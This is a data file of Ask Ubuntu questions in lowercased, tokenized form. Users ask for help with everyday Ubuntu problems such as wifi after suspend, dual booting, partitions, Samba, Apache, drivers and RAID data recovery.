378966	lenovo g570 shutting down randomly with ubuntu	i 'll be sitting at my computer and it shuts down all of a sudden i 've looked though the computer nothing is really out of the ordinary however when it does do this is comes back online very slowly here is my syslog http : //pastebin.com/ssnaf6w1 i 've read though it but i 'm not sure what it could be i 'd like to know why it does this mainly . also my computer has the following specs memory : 11.7 gib processor : intel® core™ i5-2450m cpu @ 2.50ghz × 4 graphics : intel® sandybridge mobile os type : 64-bit disk : 1.1 tb ( 120 gb ssd + 1 tb wd hdd ) ubuntu version 13.10
378968	networking/wifi disabled and unable to enable after resuming from suspend in 13.10	after waking the system from suspend my networking is disabled and will not start again , this started happening after upgrading from 13.04 to 13.10 sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 90 : fb : a6 : a8:52:40 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:6000 ( size=256 ) memory : f0010000-f0010fff memory : f0000000-f000ffff memory : f0020000-f003ffff *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 00:26:82 : a3 : fa:70 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.0.103 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:19 memory : f1100000-f1103fff
378971	how to uninstall linux-backports-modules-cw-3.4-precise-generic ?	how to uninstall linux-backports-modules-cw-3.4-precise-generic ? i want to uninstall it . how ? i try following command but not working $ sudo apt-get remove linux-backports-modules-cw-3.4-precise-generic
378973	installing gnome 1 or 2.6 or any early 2004 versions of gnome on ubuntu 12.04	i would like to experience the older version of computers , but with latest software if possible give me a solution using terminal
378980	problem with cryptdisks-udev service	i am getting an error when i run 'puppet resource services ' that complains about the cryptdisks-udev service . the exact error message is as follows : status : unknown parameter : devname the error can be replicated by issuing the following command 'service cryptdisk-udev ' it also responds with the same error . what can be done to resolve this service issue , i only have the swap partition that is relying on cryptdisks at this time . also no other pertinent logs show up when the command is executed . edit : it seems like there may be an environmental variable issue ? i am really not sure . if anyone has experienced such an issue i would love to hear what you did to resolve it , as i would like to see the full catalog of services configured on this machine .
378984	how to boot xubuntu with refind ?	i currently have arch ( 64 bit ) installed and am booting it with refind . i also have windows 7 64 bit installed and the dual booting works just fine . concerning linux , /home and / are on two different logical partitions . say i install xubuntu to arch 's current / , how could i set up xubuntu to boot with refind then ? fwiw , i omitted any explicit info since i am looking for conceptual advice . i know the *buntus use grub so this is where i am currently pausing . i 'm a bit clueless how i could set that up .
378985	how to control wpa_supplicant via dbus control interface ?	i am trying to control the wpa_supplicant by dbus control interface . any one knows how to do it using python ?
378988	how to fix my dual boot ?	i recently updated to version 13.10 of ubuntu , and it is very broken . i would like to do a clean install but when i do this , i would like to fix my dual boot issues . i am currently using a sony vaio ( that comes with all of the wonderful vaio partitions ) and uefi boot . to start my laptop in ubuntu , i first have to go into my bios settings and switch from uefi to legacy boot . is there a better way to do this so i do n't have to access my bios every time i want to switch between operating systems ? also , if i do a clean install of ubuntu 13.10 , will there still be issues with network manager not working after my computer goes to sleep ? thanks !
378990	why my sound setting turn randomly off ?	everytime when i try to watch videos , play games or even computer just stands audio setting will be turned off automatically ? and i need to go to setting and click output volume again to on . im using ubuntu 13.10
378994	which file is changed or event is fired when something is copied to the clipboard ( ctrl + c ) ?	if i 'd to hook a function or a program that should execute when the system clipboard content is changed then of which file i 've to keep checking or which event is fired and how to catch that event by a programming language ? or a command that can output clipboard content to the terminal so that i can keep running command after short intervals and see if the content has been changed or not . thanks
379002	nvidia drivers for geforce 720m on ubuntu 13.10	i have an asus notebook equipped with a geforce 720m graphic card . i know that nvidia drivers exist ( nvidia-linux-x86_64-331.20 ) but i ca n't install them through the tool ( no drivers found ) and if i try to run the script i get many errors and the whole process will stop . how can i enable those drivers ? i 'm getting a really poor graphic performance
379007	how can i resize my partition inside extended partition giving its space from outside of extended partition ?	i am having this set up at the moment : and i would like to give the unallocated space between /dev/sda3/ and /dev/sda4 to /dev/sda5` . how can i do that now ?
379008	creating multiple partitions	i am installing ubuntu 12.04 , just removed all the existing partitions which had earlier windows xp and ubuntu 13.04 . i am doing a fresh install now . i want multiple drives , just in case i need them to save some media files , etc etc.. my laptop hardrive is of 320 gb i have already created three partitions - swap for 4 gb , root ( / ) for 20 gb and /home for 10gb and i have still a free space of 280gb . what next for me ? should i increase /home and how to create some additional drives/partitions . any help will be helpful . note : i do not want a dual boot at all . only ubuntu 12.04
379010	how to install mobile broadband datacard software ?	im just installed ubuntu . and im new in ubuntu . i wan na install my datacard software into computer and entering internet . is it possible in ubuntu to install datacard software ? if yes , please tell me how .
379013	after upgrade all top right links icons got missing and the system crash once and again	i´ve upgraded my ubuntu installation for the first time ( i´m new in linux ) , and after doing it it became quite slow . but the real issue is that all links and stuff that used to be in the upper right corner have dissappeared ( so i can´t get to the settings , nor the wifi icon , the clock , the link to shut down the system , etc ) . i thought it could be something about unity not upgraded correctly , so i´ve run sudo apt-get upgrade unity , with no luck . i´ve read that some people have troubles when upgrading , and you can do something about it ( maybe something like reversing or un-doing the upgrade ? ) . but you have to know what package is broken . when i try to get to the update icon , i get this alert that says `` sorry , ubuntu 13.10 has experienced an internal error '' . how may i know that ? what should i do ? ps . i´ve read this post , but i think it´s not my case , because i don´t have any single icon there .
379017	receiving error `` [ warn ] namevirtualhost *:80 has no virtualhosts '' on apache restart	i am getting the error ' [ warn ] namevirtualhost *:80 has no virtualhosts' when restarting apache2 on ubuntu 12.04 server even though i have extra/http-vhosts.conf uncommented and included in http.conf and two working virtual host entries defined . # # use name-based virtual hosting . # namevirtualhost *:80 # # virtualhost example : # almost any apache directive may go into a virtualhost container . # the first virtualhost section is used for all requests that do not # match a servername or serveralias in any < virtualhost > block . # # < virtualhost *:80 > # serveradmin webmaster @ dummy-host.example.com # documentroot `` /opt/bitnami/apache2/docs/dummy-host.example.com '' # servername dummy-host.example.com # serveralias www.dummy-host.example.com # errorlog `` logs/dummy-host.example.com-error_log '' # customlog `` logs/dummy-host.example.com-access_log '' common # < /virtualhost > < virtualhost *:80 > documentroot /opt/bitnami/apache2/htdocs/myhostname.co.uk servername local.myhostname # custom log file loglevel warn errorlog /opt/bitnami/apache2/logs/myhostname.log < directory /opt/bitnami/apache2/htdocs/myhostname.co.uk > options indexes followsymlinks order allow , deny allow from all < /directory > < /virtualhost > < virtualhost *:80 > documentroot /opt/bitnami/apache2/htdocs/myhostname2.com servername local.myhostname2 # custom log file loglevel warn errorlog /opt/bitnami/apache2/logs/myhostname2.log < directory /opt/bitnami/apache2/htdocs/myhostname2.com > options indexes followsymlinks order allow , deny allow from all < /directory > < /virtualhost >
379020	code works in terminal but not in script for renaming ( manipulate filenames with spaces )	i want to learn more so i have tried to script more than just using the terminal . i know rename and i can rename image files with rename 's/ /_/g ' *.jpg but when i write it in a shell script to point at a directory : directory= '' /foo/bar '' for imgfile in $ ( find $ directory -type f -name \*.jpg ) ; do echo 'replacing whitespace in ' $ ( basename $ imgfile ) rename -f 's/ /_/g ' *.jpg done it does n't work and the terminal will take a file ( example : 1234 abcd.jpg ) and echo abcd.jpg . so where am i going wrong ?
379021	changing the mount point for logical partitions	i have installed ubuntu and one of partition is mounted as a /boot and other one is mounted at /home . please let me know to change the partition mount point from /home to /boot .
379023	my ntfs partition no longer automounts	linux used to automount my windows . but it was a 32-bit windows , so after installing 64-bit windows , it no longer automounts . it keeps showing at the start - the disk drive for /windows is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery . what should i do ?
379024	sync sound on multiple computers	i recently acquired two computers because the university bought new ones . i connected them to my two sound system ( i managed to acquire two old sound systems some time ago ) using a jack 3.5 output . i 've put them on opposite sides of my room ( yes it 's just the one room ) and i would like to sync the sound output of both pc 's using wifi . normally i would just use vlc , correct for the delay and be done with it but unfortunately i 'm not streaming mp3 files but actual sound from the internet . i do not care if there is a delay between receiving the sound and actual playing the sound i just want these two pc 's sound systems synced . the distance between the two computers and sound systems is to long to be able to cheaply run a jack cable between them without sound quality loss . does anyone know how to do this ?
379030	crypttab syntax for luks container with key file	what is exactly the syntax of /etc/crypttab for a key file please ? sudo cryptsetup luksopen uuid= < ... > test -- key-file /home/gaucher/testkey does open the luks partition . but , if i add the following line in /etc/crypttab : test uuid= < ... > /home/gaucher/testkey luks that does not work ! i click the icon of the partition and something is pending , i have to kill a process called cryptsetup luksopen /dev/thedevice test which seems to be stuck . what is wrong in this line ? man crypttab for my system says : the third field , key file , describes the file to use as a key for decrypting the data of the source device . note that the entire key file will be used as the passphrase ; the passphrase must not be followed by a newline character .
379033	how to upgrade or downgrade the kernel in ubuntu ( to any stable or testing release )	when i report a bug i may be asked to `` try out the latest upstream kernel '' , how do i do that ? i see a lot of version specific answers to this question here on ask ubuntu , what are the general instructions ?
379036	how do i redownload ubuntu on my computer if ubuntu will not load ?	my friend downloaded ubuntu onto my laptop for me and when i restarted it after being asked for my password , it will not load past the boot options menu . i do not have another computer to use and i am wondering if i can reload ubuntu off of a passport or 7gb sd card .
379038	`` anachronistic crom '' messages when booting up	my screen shows this message when i try to start xubuntu : startind anachronistic crom stopping anachronistic crom checking battery state stopping system v runlevel compatibility starting what can i do ?
379039	how to mount windows shadow volume	i 've seen the instructions on mounting a windows partition when using ubuntu . will fdisk -l show a windows shadow volume as a separate partition ? if not , is a windows shadow volume accessible to ubuntu when the standard windows partition is mounted ?
379040	wifi drivers for rtl8188e does not work	i have a toshiba s55-a5236 , currently i have ubuntu 13.04 installed and my kernel 3.12.0-031200-generic . when i do lspci i get back : 00:00.0 host bridge : intel corporation haswell dram controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation haswell hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation lynx point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation lynx point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point pci express root port # 1 ( rev d4 ) 00:1c.2 pci bridge : intel corporation lynx point pci express root port # 3 ( rev d4 ) 00:1c.3 pci bridge : intel corporation lynx point pci express root port # 4 ( rev d4 ) 00:1d.0 usb controller : intel corporation lynx point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point smbus controller ( rev 04 ) 02:00.0 network controller : realtek semiconductor co. , ltd. device 8179 ( rev 01 ) 03:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) i am dual booting windows 8.1 ( not by my choice ) and ubuntu 13.04 ( both are x64 ) due to the latest kernel update i am now stuck without wifi and have been trying to fix it without any luck . if someone would please help me ( and i am a beginner at bash , but eager to learn ) fix this problem prior to me throwing this computer out the window i would be very grateful . oh , i have tried to download the driver from the website and compile it , but i am receiving compilation errors . i tried freedomben 's git solution but i can figure it out . thanks , jack dare update : user217298 's answer was the fix , to why chili555 's answer would n't work , however after the fix my wifi is now working . i would put a checkmark next to his answer but it wont let me . thank you for your answers .
379041	how to install skype in ubuntu 13.10 ?	i have trouble installing skype in ubuntu 13.10 . installing skype through the software center gives an error segmentation fault ( core dumped ) and after removing skype by using sudo apt-get remove skype i tried to install skype with sudo apt-get install skype which gives an error e : package 'skype : i386 ' has no installation candidate any ideas how i can install skype ?
379044	samba -- can not access samba share from xp	can not access samba share on ubuntu 12.04 box from xp box . samba is up and running on the ubuntu box . smb.conf has the correct windows workgroup name in it , and i can see the ubuntu box from the xp machine . on the ubuntu box , i have set up a unix username ccd1 with a password for the purposes of sharing . i have added a samba username in samba server configuration of unix name : ccd1 , windows username : mike ( username on the xp box ) , and put in password ( same as used for the unix username ) . i have given access to the samba shared folder for this username . on the xp box i can browse the network neighborhood , drill down to the workgroup shares and see the ubuntu box . i can see the shared folder on the ubuntu box . it is also sharing printers . i can access the printers , i can not access the shared folder . here is how /etc/samba/smb.conf lists the two shares : [ print $ ] comment = all printers browseable = no path = var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 6766 [ ccd_staff_dailies ] comment = shared folder path = /media/hdd 1/ccd/ccd_staff_dailies writeable = yes ; browseable = yes valid users = sysadmin , ccd1 if i attempt to view the contents of the shared folder from the xp box it does n't ask for my credentials , i just get : \ccd-files-linux\ccd_staff_dailies is not accessible . you might not have permission to use this network resource . contact the administrator of this server to find out if you have access permissions . access is denied . ''
379045	will ubuntu tv be installable on regular computers with tv cards ?	background at home and i use a htpc to serve tv . the htpc has 2 ceton infinitv 4 pcie cards ; it runs win7 with windows media server . i have 5 xbox 360 's in the house and they connect to the media server as media server extenders . i can watch live tv on each xbox , record shows and watch them on any xbox . it has many problems , although better than an original dvr from comcast . overall , microsoft software barely runs , and i do n't think it will be fixed . i am using this because it saves money in the long run , when compared to monthly fees . that is where ubuntu tv would be nice - if it will work this way . i’m reading about it now and it looks like it’s going the way of installed by company on tv and that’s it . not installable on htpc , can’t connect clients to it . can we get a clear vision to the path ubuntu tv will play ? is it only going to be pre-installed on some tvs or will i be able to install it on a pc ? if installed on a pc , will it recognize tv cards such as infinitv that handle cablecards that give hd and paid for channels like hbo , or only simple tv cards like hauppauge that only give you basic analog channels ? if installed on a pc , can i connect other pcs with ubuntutv on them to watch tv ( have the server lock a tuner for that client , like wmc ) ?
379049	rescue data from corupted hdd	i have ubuntu server with 3 x 1.5tb sata2 on software raid5 and lvm , it runs as vps node . this morning guy from datacenter sent me mail that sda is corrupted and it needs to be changed ... so he change it and found out that sdc is also corrupted , and i demanded that he returns old sda so that i could try to restore some files . i installed grub-install on sdb but it 's unconfigured , and on sdb1 there is only `` lost+found '' ( i mount it in live rescue system and checked ) , and that is only partition that i can mount , as you can see in following ( + fsck ) : root @ rescue ~ # ll /mnt/ total 0 root @ rescue ~ # cd /mnt/ root @ rescue /mnt # mkdir sda sda1 sda2 sdb sdb1 sdb2 sdc root @ rescue /mnt # mount /dev/sda /mnt/sda mount : /dev/sda already mounted or /mnt/sda busy root @ rescue /mnt # mount /dev/sda1 /mnt/sda1 mount : unknown filesystem type 'linux_raid_member' root @ rescue /mnt # mount /dev/sda2 /mnt/sda2 mount : unknown filesystem type 'linux_raid_member' root @ rescue /mnt # mount /dev/sdb /mnt/sdb mount : you must specify the filesystem type root @ rescue /mnt # mount /dev/sdb1 /mnt/sdb1 root @ rescue /mnt # mount /dev/sdb2 /mnt/sdb2 mount : you must specify the filesystem type root @ rescue /mnt # mount /dev/sdc /mnt/sdc mount : you must specify the filesystem type root @ rescue /mnt # root @ rescue /mnt # df -h filesystem size used avail use % mounted on rootfs 12g 1.6m 12g 1 % / udev 12g 0 12g 0 % /dev 188.40.24.212 : /nfs 1.4t 592g 722g 46 % /root/.oldroot/nfs aufs 12g 1.6m 12g 1 % / tmpfs 2.4g 288k 2.4g 1 % /run tmpfs 5.0m 0 5.0m 0 % /run/lock tmpfs 4.8g 0 4.8g 0 % /run/shm /dev/sdb1 492m 2.9m 453m 1 % /mnt/sdb1 root @ rescue /mnt # fsck /dev/sda fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) /dev/sda is in use . e2fsck : can not continue , aborting . root @ rescue /mnt # fsck /dev/sda1 fsck from util-linux 2.20.1 fsck : fsck.linux_raid_member : not found fsck : error 2 while executing fsck.linux_raid_member for /dev/sda1 root @ rescue /mnt # fsck /dev/sda2 fsck from util-linux 2.20.1 fsck : fsck.linux_raid_member : not found fsck : error 2 while executing fsck.linux_raid_member for /dev/sda2 root @ rescue /mnt # fsck /dev/sdc fsck from util-linux 2.20.1 ^c e2fsck 1.42.5 ( 29-jul-2012 ) fsck.ext2 : attempt to read block from filesystem resulted in short read while trying to open /dev/sdc could this be a zero-length partition ? root @ rescue /mnt # root @ rescue /mnt # fsck /dev/sdb fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) /dev/sdb is in use . e2fsck : can not continue , aborting . root @ rescue /mnt # fsck /dev/sdb1 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) /dev/sdb1 is mounted . e2fsck : can not continue , aborting . root @ rescue /mnt # fsck /dev/sdb2 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/sdb2 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > also here is some extra info : root @ rescue /mnt # mount /dev/sdc /mnt/sdc root @ rescue /mnt # mount /dev/sda /mnt/sda mount : /dev/sda already mounted or /mnt/sda busy root @ rescue /mnt # dmesg | tail -n 100 [ 5983.073733 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.093445 ] ata4.00 : irq_stat 0x40000001 [ 5983.112706 ] ata4.00 : cmd c8/00:02:1a:00:00/00:00:00:00:00/e0 tag 0 dma 1024 in [ 5983.112706 ] res 51/04:02:1a:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.152382 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.152389 ] ata4 : eh complete [ 5983.152524 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.172225 ] ata4.00 : irq_stat 0x40000001 [ 5983.191500 ] ata4.00 : cmd c8/00:02:1a:00:00/00:00:00:00:00/e0 tag 0 dma 1024 in [ 5983.191500 ] res 51/04:02:1a:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.231138 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.231145 ] ata4 : eh complete [ 5983.231280 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.250992 ] ata4.00 : irq_stat 0x40000001 [ 5983.270263 ] ata4.00 : cmd c8/00:02:1a:00:00/00:00:00:00:00/e0 tag 0 dma 1024 in [ 5983.270263 ] res 51/04:02:1a:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.309890 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.309898 ] ata4 : eh complete [ 5983.310033 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.329745 ] ata4.00 : irq_stat 0x40000001 [ 5983.349017 ] ata4.00 : cmd c8/00:02:1a:00:00/00:00:00:00:00/e0 tag 0 dma 1024 in [ 5983.349017 ] res 51/04:02:1a:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.388611 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.388618 ] ata4 : eh complete [ 5983.388847 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.408712 ] ata4.00 : irq_stat 0x40000001 [ 5983.429984 ] ata4.00 : cmd c8/00:02:1a:00:00/00:00:00:00:00/e0 tag 0 dma 1024 in [ 5983.429984 ] res 51/04:02:1a:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.474085 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.474100 ] ata4 : eh complete [ 5983.474228 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.494517 ] ata4.00 : irq_stat 0x40000001 [ 5983.514473 ] ata4.00 : cmd c8/00:02:1a:00:00/00:00:00:00:00/e0 tag 0 dma 1024 in [ 5983.514473 ] res 51/04:02:1a:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.555572 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.555587 ] sd 3:0:0:0 : [ sdc ] [ 5983.555590 ] result : hostbyte=did_ok driverbyte=driver_sense [ 5983.555593 ] sd 3:0:0:0 : [ sdc ] [ 5983.555595 ] sense key : aborted command [ current ] [ descriptor ] [ 5983.555598 ] descriptor sense data with sense descriptors ( in hex ) : [ 5983.555600 ] 72 0b 00 00 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 5983.555608 ] 00 00 00 1a [ 5983.555613 ] sd 3:0:0:0 : [ sdc ] [ 5983.555615 ] add . sense : no additional sense information [ 5983.555619 ] sd 3:0:0:0 : [ sdc ] cdb : [ 5983.555620 ] read ( 10 ) : 28 00 00 00 00 1a 00 00 02 00 [ 5983.555628 ] end_request : i/o error , dev sdc , sector 26 [ 5983.575924 ] buffer i/o error on device sdc , logical block 13 [ 5983.596058 ] ata4 : eh complete [ 5983.596189 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.616541 ] ata4.00 : irq_stat 0x40000001 [ 5983.636612 ] ata4.00 : cmd c8/00:04:1c:00:00/00:00:00:00:00/e0 tag 0 dma 2048 in [ 5983.636612 ] res 51/04:04:1c:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.677777 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.677784 ] ata4 : eh complete [ 5983.677924 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.698262 ] ata4.00 : irq_stat 0x40000001 [ 5983.718291 ] ata4.00 : cmd c8/00:04:1c:00:00/00:00:00:00:00/e0 tag 0 dma 2048 in [ 5983.718291 ] res 51/04:04:1c:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.759539 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.759553 ] ata4 : eh complete [ 5983.759675 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.779991 ] ata4.00 : irq_stat 0x40000001 [ 5983.800041 ] ata4.00 : cmd c8/00:04:1c:00:00/00:00:00:00:00/e0 tag 0 dma 2048 in [ 5983.800041 ] res 51/04:04:1c:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.841255 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.841269 ] ata4 : eh complete [ 5983.841391 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.861707 ] ata4.00 : irq_stat 0x40000001 [ 5983.881708 ] ata4.00 : cmd c8/00:04:1c:00:00/00:00:00:00:00/e0 tag 0 dma 2048 in [ 5983.881708 ] res 51/04:04:1c:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5983.922818 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5983.922831 ] ata4 : eh complete [ 5983.922952 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5983.943262 ] ata4.00 : irq_stat 0x40000001 [ 5983.963273 ] ata4.00 : cmd c8/00:04:1c:00:00/00:00:00:00:00/e0 tag 0 dma 2048 in [ 5983.963273 ] res 51/04:04:1c:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5984.004398 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5984.004412 ] ata4 : eh complete [ 5984.004561 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 5984.024824 ] ata4.00 : irq_stat 0x40000001 [ 5984.044713 ] ata4.00 : cmd c8/00:04:1c:00:00/00:00:00:00:00/e0 tag 0 dma 2048 in [ 5984.044713 ] res 51/04:04:1c:00:00/00:00:00:00:00/e0 emask 0x1 ( device error ) [ 5984.085733 ] ata4.00 : configured for udma/133 ( device error ignored ) [ 5984.085741 ] sd 3:0:0:0 : [ sdc ] [ 5984.085743 ] result : hostbyte=did_ok driverbyte=driver_sense [ 5984.085744 ] sd 3:0:0:0 : [ sdc ] [ 5984.085745 ] sense key : aborted command [ current ] [ descriptor ] [ 5984.085746 ] descriptor sense data with sense descriptors ( in hex ) : [ 5984.085747 ] 72 0b 00 00 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 5984.085751 ] 00 00 00 1c [ 5984.085753 ] sd 3:0:0:0 : [ sdc ] [ 5984.085754 ] add . sense : no additional sense information [ 5984.085755 ] sd 3:0:0:0 : [ sdc ] cdb : [ 5984.085756 ] read ( 10 ) : 28 00 00 00 00 1c 00 00 04 00 [ 5984.085760 ] end_request : i/o error , dev sdc , sector 28 [ 5984.106176 ] buffer i/o error on device sdc , logical block 14 [ 5984.126323 ] buffer i/o error on device sdc , logical block 15 [ 5984.146119 ] ata4 : eh complete [ 5984.146128 ] cramfs : wrong magic root @ rescue /mnt # root @ rescue ~ # ll /dev/sd* brw-rw -- -t 1 root disk 8 , 0 nov 18 17:56 /dev/sda brw-rw -- -t 1 root disk 8 , 1 nov 18 17:57 /dev/sda1 brw-rw -- -t 1 root disk 8 , 2 nov 18 17:57 /dev/sda2 brw-rw -- -t 1 root disk 8 , 16 nov 18 17:56 /dev/sdb brw-rw -- -t 1 root disk 8 , 17 nov 18 17:56 /dev/sdb1 brw-rw -- -t 1 root disk 8 , 18 nov 18 18:53 /dev/sdb2 brw-rw -- -t 1 root disk 8 , 32 nov 18 18:24 /dev/sdc root @ rescue ~ # ll /dev/md* brw-rw -- -t 1 root disk 9 , 0 nov 18 17:57 /dev/md0 brw-rw -- -t 1 root disk 9 , 1 nov 18 17:57 /dev/md1 /dev/md : total 0 root @ rescue ~ # mdadm -- detail /dev/md0 /dev/md0 : version : 0.90 creation time : sun oct 17 14:55:20 2010 raid level : raid1 array size : 528128 ( 515.84 mib 540.80 mb ) used dev size : 528128 ( 515.84 mib 540.80 mb ) raid devices : 3 total devices : 1 preferred minor : 0 persistence : superblock is persistent update time : mon nov 18 19:40:49 2013 state : clean , degraded active devices : 1 working devices : 1 failed devices : 0 spare devices : 0 uuid : acc3740a : bf0cfaea:776c2c25:004bd7b2 ( local to host rescue ) events : 0.1416 number major minor raiddevice state 0 8 1 0 active sync /dev/sda1 1 0 0 1 removed 2 0 0 2 removed root @ rescue ~ # mdadm -- detail /dev/md1 mdadm : md device /dev/md1 does not appear to be active . if anyone has any sugestion that would be great ; ) thanks , frane m .
379051	i ca n't update ubuntu server after installation	after ubuntu server 12.04 installation , i try to update system : sudo apt-get update sudo apt-get upgrade updating begins , but after a while stops on setup of apparmor package ( russian setup language ) : настраивается пакет apparmor ( 2.7.102-0ubuntu3.9 ) ... устанавливается новая версия файла настройки /etc/apparmor.d/abstractions/ubuntu-browsers.d/ubuntu-integration ... also , i set ubuntu server 13.10 and ubuntu desktop 12.04 - there is the same problem . pc config : mb : foxconn 45cs 1gb ram hdd : 2tb seagate barracuda ( but i 'm try to install on wd caviar green ) i think that a problem in support of this motherboard in new ubuntu versions . earlier ubuntu desktop 10.04 ( updated to 11 versions ) was set and everything worked . how to solve such problem ? tnx . sorry for my english : )
379052	latest update breaks nvidia-prime ?	currently i 'm using a dell latitude e6430 . i recently updated to to ubuntu 13.10 ( from 13.04 ) . i installed the nvidia-319-updates/nvidia-settings-319-updates/nvidia-prime drivers ( also tried the plain nvidia-319/nvidia-settings-319 drivers ) , disabled optimus , and was able to use multiple monitors with the dell dock ( after creating some xrandr scripts ) . however , after the latest round of updates everything stopped working . now , whenever i boot the 80 % of the screen is stuck on the blue fde ( full disk encryption ) password screen , the other 20 % will load an incredibly skewed login screen ( compressed to a height of ~100-200 pixels , and the width of the screen ) . you can move the mouse and see that the screen is updating , it 's just not legible at all . in order to fix it , i have to do the following : shutdown startup ( going to the bios ) enable optimus reboot boot up , enter fde password wait until boot finishes ( fails ? ) , as i 'm stuck on a blank screen shutdown startup ( going to the bios ) disable optimus reboot starts up normally i have to do this every time i restart the computer . needless to say , it 's rather annoying . i 've tried : re-re-installing lightdm , the nvidia drivers , etc ... , and updating the bios to the latest version . any help would be greatly appreciated .
379054	grub rescue , unaware of ubuntu on my machine	i was unaware my friend installed ubuntu on my machine until now because im suddenly getting a grub rescue error . all i did yesterday was turn the machine on , check email and turn it off . today it wont start and im getting the grub rescue error . from what ive been able to understand so far with my limited knowledge of this situation is i need to install ubuntu on a thumbdrive since i dont have a disk , but from there i have no idea how to access it from the thumbdrive and fix this problem . i 'd also like someone to confirm that files wo n't be lost before doing this fix attempt . ( windows 7 as my main os )
379055	ssd randomly filling up . ubuntu 13.04	i am running ubuntu 13.04 on my laptop . it 's installed on a 100 gb ext4 partition on my ssd . in the past two weeks i have been encountering this weird problem where i get random notifications that my harddrive is full . the sum total of all the files in this partition is less than 20 gb . the last time i encountered the same problem i tried using disk manager to see where all this space was being used up ; i found nothing . i did n't have the time to read up and fix it last time so i did n't use ubuntu for a few days . when i rebooted it the next time all was in order . this time my unity lens and search is irresponsive and not showing any results . files ( default ) and nemo both refuse to launch as well . how to fix this ? any help would be greatly appreciated .
379056	headphones not working but external speakers working	i 'm running ubuntu 13.10 , and my headphones have randomly stopped working - sound plays from the laptop speakers when the headphones are unplugged , but no sound comes through the headphones . the headphones themselves work , and are detected by the computer . i 'm not sure what could be wrong , please help ?
